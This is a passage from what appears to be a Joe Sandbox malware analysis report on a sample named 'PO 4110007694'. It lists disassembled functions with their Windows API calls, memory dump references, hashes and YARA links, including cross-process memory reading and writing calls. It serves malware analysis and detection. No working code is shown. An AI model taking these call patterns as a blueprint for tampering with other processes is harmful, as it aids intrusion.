                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ForegroundPixelRelease
                                                                    • String ID:
                                                                    • API String ID: 4156661090-0
                                                                    • Opcode ID: 4c2114aed02caed2f9d5676b1035392a2d3ebd73134bf041623dd2e6dd9ad381
                                                                    • Instruction ID: 8769df7d1f6af3cc4d316e7a5416504a0a020480da6ea21affae476676d09eab
                                                                    • Opcode Fuzzy Hash: 4c2114aed02caed2f9d5676b1035392a2d3ebd73134bf041623dd2e6dd9ad381
                                                                    • Instruction Fuzzy Hash: 45216235A00204AFD714EF65D888BAEB7E5EF49350F14C479F949D7351CA70AD41EB90
                                                                    Function 00C112F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C1134D
                                                                    • SelectObject.GDI32(?,00000000), ref: 00C1135C
                                                                    • BeginPath.GDI32(?), ref: 00C11373
                                                                    • SelectObject.GDI32(?,00000000), ref: 00C1139C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                    • String ID:
                                                                    • API String ID: 3225163088-0
                                                                    • Opcode ID: d095c0650c0b882789c7c4c4006d80ac58c0cca81b3afadeec574724aec19e60
                                                                    • Instruction ID: 19bbf47f5596d48529563adf164d3af038f08d5d7c973c54f62916736fd97a66
                                                                    • Opcode Fuzzy Hash: d095c0650c0b882789c7c4c4006d80ac58c0cca81b3afadeec574724aec19e60
                                                                    • Instruction Fuzzy Hash: C2215C70841608EFDB109F25EC087AD7BE8FB01322F58422BF920961F4D37499A1EF90
                                                                    Function 00C6BC9E Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: _memcmp
                                                                    • String ID:
                                                                    • API String ID: 2931989736-0
                                                                    • Opcode ID: 2f66debbcd21c118c12311c8a09c1c2c2d2ca3ac622de83d136007cccc2e42cd
                                                                    • Instruction ID: 98ff4086eff1f0d1b751888404d428484ba25e56acb29eabb068207eae11224d
                                                                    • Opcode Fuzzy Hash: 2f66debbcd21c118c12311c8a09c1c2c2d2ca3ac622de83d136007cccc2e42cd
                                                                    • Instruction Fuzzy Hash: FE01B5726041167FE2246B1A6DC2FBBB35CDE5139CF084021FE15D6246EB61EF5092A0
                                                                    Function 00C74A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00C74ABA
                                                                    • __beginthreadex.LIBCMT ref: 00C74AD8
                                                                    • MessageBoxW.USER32(?,?,?,?), ref: 00C74AED
                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00C74B03
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00C74B0A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                    • String ID:
                                                                    • API String ID: 3824534824-0
                                                                    • Opcode ID: 46e168895e1f617544725088c1317ce2b92f5819ac27d760bd1abafc2a48aa70
                                                                    • Instruction ID: e608805df7655b57b16cd8f470699d5ddb12c96fbb02705e147f44994fbda671
                                                                    • Opcode Fuzzy Hash: 46e168895e1f617544725088c1317ce2b92f5819ac27d760bd1abafc2a48aa70
                                                                    • Instruction Fuzzy Hash: EA110876D05619BBC7058FB89C08BAF7FACEB45320F14826AF828D3260D771CD0487A0
                                                                    Function 00C68202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C6821E
                                                                    • GetLastError.KERNEL32(?,00C67CE2,?,?,?), ref: 00C68228
                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00C67CE2,?,?,?), ref: 00C68237
                                                                    • HeapAlloc.KERNEL32(00000000,?,00C67CE2,?,?,?), ref: 00C6823E
                                                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C68255
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                    • String ID:
                                                                    • API String ID: 842720411-0
                                                                    • Opcode ID: 8498e78f9f32adec0ed47ea1ec31ef105ec70f8fb00c58025578416de64fa54d
                                                                    • Instruction ID: 800b0a355eacd8c0f441df2909cba28dcda03313fc58f0478d68c6ace4c96bcd
                                                                    • Opcode Fuzzy Hash: 8498e78f9f32adec0ed47ea1ec31ef105ec70f8fb00c58025578416de64fa54d
                                                                    • Instruction Fuzzy Hash: BE016DB1204204BFDB204FA5DC8CE6F7BACEF8A755B50052EF859C2260DA318D45CA60
                                                                    Function 00C6710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C67044,80070057,?,?,?,00C67455), ref: 00C67127
                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C67044,80070057,?,?), ref: 00C67142
                                                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C67044,80070057,?,?), ref: 00C67150
                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C67044,80070057,?), ref: 00C67160
                                                                    • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C67044,80070057,?,?), ref: 00C6716C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                    • String ID:
                                                                    • API String ID: 3897988419-0
                                                                    • Opcode ID: 2c07e8a28f99e4185450ea9df65b890afd6fad49cab60c9088524003a91be8c8
                                                                    • Instruction ID: 39ef8285ac6d47b8c720aa7ec1316df1712aea4b3411f298a86bd165c4cae252
                                                                    • Opcode Fuzzy Hash: 2c07e8a28f99e4185450ea9df65b890afd6fad49cab60c9088524003a91be8c8
                                                                    • Instruction Fuzzy Hash: 1001D472600204BBDB204F24DC88BAE7BBCEF46795F10066AFD08D2220D7B1DD4187A0
                                                                    Function 00C75244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C75260
                                                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00C7526E
                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C75276
                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00C75280
                                                                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C752BC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                    • String ID:
                                                                    • API String ID: 2833360925-0
                                                                    • Opcode ID: 4c50c897100d780919b910956d0dd04a96d5866fb228ef7f46deeeb1d5ffb6b7
                                                                    • Instruction ID: b17547bfab1dc0b7e32323aaf3553dd811c5473d6f37664d8205adafca7e9fbb
                                                                    • Opcode Fuzzy Hash: 4c50c897100d780919b910956d0dd04a96d5866fb228ef7f46deeeb1d5ffb6b7
                                                                    • Instruction Fuzzy Hash: D5015731D01A19DBCF00EFE5E84CBEDBB78BB08711F40415AE949F2256DBB09A5187A5
                                                                    Function 00C6810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C68121
                                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C6812B
                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C6813A
                                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C68141
                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C68157
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                    • String ID:
                                                                    • API String ID: 44706859-0
                                                                    • Opcode ID: 90997b93dc7b677b2a4826c3658e94bbfa817c10e0029c8e294a37144d156664
                                                                    • Instruction ID: 39ebc1db735d5a4850d94c5d4b55725f16b3aee9c9f7044b71bed05a5091f34e
                                                                    • Opcode Fuzzy Hash: 90997b93dc7b677b2a4826c3658e94bbfa817c10e0029c8e294a37144d156664
                                                                    • Instruction Fuzzy Hash: 98F04F71200304AFEB210FA5ECDDF6F3BACFF4AB58B10012AF985C6160CA619946DA60
                                                                    Function 00C6C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00C6C1F7
                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 00C6C20E
                                                                    • MessageBeep.USER32(00000000), ref: 00C6C226
                                                                    • KillTimer.USER32(?,0000040A), ref: 00C6C242
                                                                    • EndDialog.USER32(?,00000001), ref: 00C6C25C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                    • String ID:
                                                                    • API String ID: 3741023627-0
                                                                    • Opcode ID: 9e58da234436d11de0156af09518a0fe9228ad160d8259355a07ca0f47c7692f
                                                                    • Instruction ID: 85e99c77674819bfd20d5f7d169f5ae02e70507a9979d91be429b70d58fd9968
                                                                    • Opcode Fuzzy Hash: 9e58da234436d11de0156af09518a0fe9228ad160d8259355a07ca0f47c7692f
                                                                    • Instruction Fuzzy Hash: 9901A77050470497EB305B61DD9EBAA7778BF00705F04026EB992D14E1D7E469559B90
                                                                    Function 00C113B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • EndPath.GDI32(?), ref: 00C113BF
                                                                    • StrokeAndFillPath.GDI32(?,?,00C4B888,00000000,?), ref: 00C113DB
                                                                    • SelectObject.GDI32(?,00000000), ref: 00C113EE
                                                                    • DeleteObject.GDI32 ref: 00C11401
                                                                    • StrokePath.GDI32(?), ref: 00C1141C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                    • String ID:
                                                                    • API String ID: 2625713937-0
                                                                    • Opcode ID: 7cf4e4b0cd21919ab8ca1e71cc31ff7f61b743dcf1b14670eafc8336adde50f0
                                                                    • Instruction ID: 358c58460538d1279692b6c0a89a154251876332e8ef633c0d63298cfa95d2cf
                                                                    • Opcode Fuzzy Hash: 7cf4e4b0cd21919ab8ca1e71cc31ff7f61b743dcf1b14670eafc8336adde50f0
                                                                    • Instruction Fuzzy Hash: 8DF0EC30045B08EBDB115F26EC4C79C3FA8A702726F1C822AE969890F1C73559A6FF50
                                                                    Function 00C22CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C30DB6: std::exception::exception.LIBCMT ref: 00C30DEC
                                                                      • Part of subcall function 00C30DB6: __CxxThrowException@8.LIBCMT ref: 00C30E01
                                                                      • Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22
                                                                      • Part of subcall function 00C17A51: _memmove.LIBCMT ref: 00C17AAB
                                                                    • __swprintf.LIBCMT ref: 00C22ECD
                                                                    Strings
                                                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00C22D66
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                    • API String ID: 1943609520-557222456
                                                                    • Opcode ID: 0a14c1fa879761a460f4303a03c2d4d009e69f3616ec537583b0b6f2038481a0
                                                                    • Instruction ID: 21963efd848ed2200b41f9a9ecf3ce592df37911556f87fb23e05457814377e8
                                                                    • Opcode Fuzzy Hash: 0a14c1fa879761a460f4303a03c2d4d009e69f3616ec537583b0b6f2038481a0
                                                                    • Instruction Fuzzy Hash: 35919375108311AFC714EF24D895CAF77B8EF86311F00491DF8959B2A1DA30EE88EB52
                                                                    Function 00C7B93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C14750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C14743,?,?,00C137AE,?), ref: 00C14770
                                                                    • CoInitialize.OLE32(00000000), ref: 00C7B9BB
                                                                    • CoCreateInstance.OLE32(00CA2D6C,00000000,00000001,00CA2BDC,?), ref: 00C7B9D4
                                                                    • CoUninitialize.OLE32 ref: 00C7B9F1
                                                                      • Part of subcall function 00C19837: __itow.LIBCMT ref: 00C19862
                                                                      • Part of subcall function 00C19837: __swprintf.LIBCMT ref: 00C198AC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                    • String ID: .lnk
                                                                    • API String ID: 2126378814-24824748
                                                                    • Opcode ID: 3244dce9800cafa2cac7aca14a4ec763704eaed1b5b1ebb50ee633bf18451c6f
                                                                    • Instruction ID: 62f050121d80f066d8edd896cc5a3481efecf59380399544aa0625c23f42a355
                                                                    • Opcode Fuzzy Hash: 3244dce9800cafa2cac7aca14a4ec763704eaed1b5b1ebb50ee633bf18451c6f
                                                                    • Instruction Fuzzy Hash: 3AA16A756043059FC700EF14C894E5AB7E5FF8A314F148998F8A99B3A1CB31ED86DB91
                                                                    Function 00C3501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __startOneArgErrorHandling.LIBCMT ref: 00C350AD
                                                                      • Part of subcall function 00C400F0: __87except.LIBCMT ref: 00C4012B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorHandling__87except__start
                                                                    • String ID: pow
                                                                    • API String ID: 2905807303-2276729525
                                                                    • Opcode ID: aafa56cf877cbd72122b017598f14d059965fcc8958aad21e6484b30a892b787
                                                                    • Instruction ID: c1bd4ca839f0e6bed48aee3b8c554882165fb1678a9926cde835e1ff708c40cc
                                                                    • Opcode Fuzzy Hash: aafa56cf877cbd72122b017598f14d059965fcc8958aad21e6484b30a892b787
                                                                    • Instruction Fuzzy Hash: BD518C71A6C90286DB257724CD4136E3B90FB41710F308E59E5E6862E9DF758FC4AAC2
                                                                    Function 00C26192 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: _memset$_memmove
                                                                    • String ID: ERCP
                                                                    • API String ID: 2532777613-1384759551
                                                                    • Opcode ID: 22b6d0e52b991a31fed95cfcd9c1ac641ae41098dc8d89312b0f7727dd37d61f
                                                                    • Instruction ID: 5da9b6780dea246e3ce62b1b7fd2ed7867420ad5924f3bfe64559cb6e6e0c7ee
                                                                    • Opcode Fuzzy Hash: 22b6d0e52b991a31fed95cfcd9c1ac641ae41098dc8d89312b0f7727dd37d61f
                                                                    • Instruction Fuzzy Hash: 1D51AEB1A00715DBDB24CFA5D885BABB7F4EF04304F20456EE85ADB691E770EA44CB90
                                                                    Function 00C697F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C714BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C69296,?,?,00000034,00000800,?,00000034), ref: 00C714E6
                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00C6983F
                                                                      • Part of subcall function 00C71487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C692C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00C714B1
                                                                      • Part of subcall function 00C713DE: GetWindowThreadProcessId.USER32(?,?), ref: 00C71409
                                                                      • Part of subcall function 00C713DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00C6925A,00000034,?,?,00001004,00000000,00000000), ref: 00C71419
                                                                      • Part of subcall function 00C713DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00C6925A,00000034,?,?,00001004,00000000,00000000), ref: 00C7142F
                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C698AC
                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C698F9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                    • String ID: @
                                                                    • API String ID: 4150878124-2766056989
                                                                    • Opcode ID: f480e82bc6954823b7b07e8be5d329fe1d9f3ef732a2280333023f2c4d861195
